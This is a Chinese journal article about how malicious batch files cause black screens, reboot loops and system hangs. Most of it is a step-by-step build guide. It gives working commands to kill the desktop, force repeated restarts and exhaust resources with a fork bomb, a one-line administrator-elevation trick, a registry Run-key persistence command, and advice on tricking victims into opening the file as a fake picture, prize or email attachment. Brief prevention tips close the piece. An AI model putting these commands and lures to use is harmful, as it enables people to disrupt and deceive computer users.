APP下载

恶意批处理文件导致电脑黑屏、反复重启、无响应的原因分析及应对思路

2020-11-08栾春伟

科学导报·学术 2020年84期
关键词:批处理注册表代码

栾春伟

电脑"黑屏"、“反复重启”、”死机无响应”,成因多种多样,处理方法也各不相同。很多时候,是恶意计算机程序导致,这里做个分析,提供一种解决思路。

一、有三条计算机命令,常被初级黑客用来制造小麻烦

1、電脑屏幕变全黑

taskkill -f -im explorer.exe

作用,关闭windows的图形桌面。

2、在指定时间后,重新启动电脑

shutdown -r -f -t 10

作用,在10秒钟后,重新启动windows电脑,强制执行。把这个命令放入“开机启动”中,可以实现开机后,反复重启计算机的效果。推而广之,也可以预定在某个约时间,执行一系列的命令,不仅仅是重启电脑,也可以备份重要数据到远程等等。

3、把计算机资源耗尽,导致死机无响应

建立一个批处理文件中,输入命令为

%0|%0

作用:批处理文件反复调用自己,每调用一次,占用一定资源,直到把计算机资源耗尽。

此外,常见的方法还有:建立一个批处理文件中,输入命令为

:callCmdWindow

start cmd.exe

goto callCmdWindow

其作用是利用批处理文件,不断弹出CMD命令窗口,直到将计算机资源耗尽。与%0|%0的思路相通,方法不同而已。

二、命令代码如何被计算机自动执行

1、利用windows自启动项

windows注册表Run键,是最易容想到的程序自启动位置,让电脑进入widonws后,自动加载恶意代码,只要把包含恶意代码的文件,加入到Run即可。Run键有2个位置,分别是:

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]

2、把批处理文件放到自启动项里

写一个批处理文件。这个批处理文件的功能,不仅包括要执行的“捣乱代码”,还要包括,取得必要的程序执行权限,修改注册表,以及把自己加载到计算机的开机自动执行程序名单里面等功能。

(1)新建一个批处理文件,

用windows自带的记事本,新建一个批处理文件,例如,文件名是:我的批处理文件.cmd,windows中批处理文件后缀是 .bat或.cmd,后缀与具体windows 版本有关。

(2)获取windows系统管理员权限

想要修改注册表,比如RUN值等,都需要先拿到计算机的系统管理员权限,才能实施。在批处理文件中加入下列命令,取得管理员权限。

%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0:","","runas",1)(window.close)&&exit

(3)批处理文件将自身加入到windows自启动项

在取得管理员权限后,在批处理文件中,写入下列代码,完成在注册表中,把批处理文件自身加入到开机启动的清单里面。这样,以后,每次电脑开机,都后执行这个批处理文件,也就是这个文件中的恶意代码。

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\run" /v 我的批处理文件 /d "%~dp0我的批处理文件.cmd" /f

(4)恶意代码

选本文第一部分介绍的3个方法之一,放 与(略)

三、如何让电脑用户点击这个批处理文件

完成上面的工作,一个简单的黑客程序就写好了。如何让别人来执行这个黑客程序呢。这就要用到社会工程学了,说白了,就是如何去忽悠人,想办法让人点击这个批处理文件,一点击,就可以在受害人的电脑上执行了。常见的就是,把这个文件伪装成吸睛美图、扫二维码中奖、老板邮件的附件等等。

四、如何防范

此种恶意代码很易容在内网中制造麻烦,因为这种恶意程序是自己编制的,用的也是正常的命令,没有进入计算机防病毒软件的病毒库,反毒软件也很发现和防范这种代码。因此,了解一些计算机安全基本常识必要,不点击来源不明的文件和链接,了解并查看自己计算机的启动项内容,会清理不必要的启动项,可以有效防范类似恶意代码。

五、结束语

本文通过实例,简明地介绍了计算机恶意程序制作及传播的基本方法,有利于提高电脑用户的网络信息安全意识,提高防范黑客攻击和计算机病毒入侵的能力,对网络管理人员解决运行中的问题,也有一定的帮助。

猜你喜欢

批处理注册表代码
就地取材用Iexpress命令封装批处理
不装软件批处理为文件夹加锁
更上一层楼 用好注册表编辑器
借助批处理 让Cortana变聪明
神秘的代码
注册表的便捷用法
一周机构净增(减)仓股前20名
重要股东二级市场增、减持明细
近期连续上涨7天以上的股
注册表编辑器也玩“失忆”